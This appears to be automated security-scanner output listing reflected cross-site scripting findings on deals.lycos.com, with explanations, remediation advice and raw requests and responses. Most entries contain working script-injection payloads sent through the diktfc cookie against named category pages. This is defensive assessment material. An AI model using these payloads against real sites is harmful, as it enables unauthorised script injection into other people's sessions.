HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22858
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df85e"><script>alert(1)</script>a9f8ea40e17 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22960
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/gifts-flowers-and-cards-218&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec09"><script>alert(1)</script>ef66589da7f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/health-and-beauty-228 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/health-and-beauty-228&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57630"%3balert(1)//273c00b5a44 was submitted in the diktfc cookie. This input was echoed as 57630";alert(1)//273c00b5a44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/health-and-beauty-228 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630"%3balert(1)//273c00b5a44; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46859
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7178c"%3balert(1)//f479da64e2a was submitted in the diktfc cookie. This input was echoed as 7178c";alert(1)//f479da64e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/home-and-garden-196 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c"%3balert(1)//f479da64e2a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48074
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574bb"><script>alert(1)</script>eefe4285fdf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/home-and-garden-196 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/home-and-garden-196&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca710"><script>alert(1)</script>8995098f657 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/lcd-tvs-424 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/lcd-tvs-424&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b4"%3balert(1)//c21369f207e was submitted in the diktfc cookie. This input was echoed as 8c8b4";alert(1)//c21369f207e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/lcd-tvs-424 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4"%3balert(1)//c21369f207e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48931
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c87eb"><script>alert(1)</script>48578ff097f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/movies-music-books-178 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/movies-music-books-178&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40639"%3balert(1)//4ac5d608389 was submitted in the diktfc cookie. This input was echoed as 40639";alert(1)//4ac5d608389 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/movies-music-books-178 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639"%3balert(1)//4ac5d608389; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46132
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7bdd"%3balert(1)//aecc2087a85 was submitted in the diktfc cookie. This input was echoed as d7bdd";alert(1)//aecc2087a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/mp3-players-144 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd"%3balert(1)//aecc2087a85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48339
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ae8"><script>alert(1)</script>c9b7635a3ff was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/mp3-players-144 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/mp3-players-144&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c09"%3balert(1)//5dd4415da8d was submitted in the diktfc cookie. This input was echoed as 52c09";alert(1)//5dd4415da8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/office-and-supplies-182 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09"%3balert(1)//5dd4415da8d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47344
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><script>alert(1)</script>9d30591a5a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/office-and-supplies-182 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/office-and-supplies-182&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fa0"><script>alert(1)</script>22b63eeca5d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/pc-computers-47 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
